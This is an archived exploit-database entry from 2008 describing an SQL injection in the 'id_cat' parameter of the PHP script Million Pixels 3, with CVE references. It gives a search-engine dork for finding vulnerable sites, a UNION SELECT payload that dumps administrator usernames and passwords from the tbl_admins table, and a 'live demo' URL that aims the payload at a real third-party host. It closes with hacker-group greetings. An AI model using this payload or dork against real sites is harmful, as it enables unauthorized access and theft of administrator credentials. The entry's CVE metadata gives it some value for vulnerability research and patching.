Million Pixels 3 - 'id_cat' SQL Injection
Author: Hussin X
type: webapps
platform: php
port:
date_added: 2008-07-10
date_updated: 2016-12-13
verified: 1
codes: OSVDB-47021;CVE-2008-4055;CVE-2008-3204
tags:
aliases:
screenshot_url:
application_url:
#################################################################
#
# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
#
#========================================================
# =
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
# =
#========================================================
#
# script : http://e-topbiz.com/oprema/pages/millionpixels3.php
#
# DorK : inurl: "tops_top.php? id_cat ="
#################################################################
Exploit:
www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
L!VE DEMO:
http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
# milw0rm.com [2008-07-11]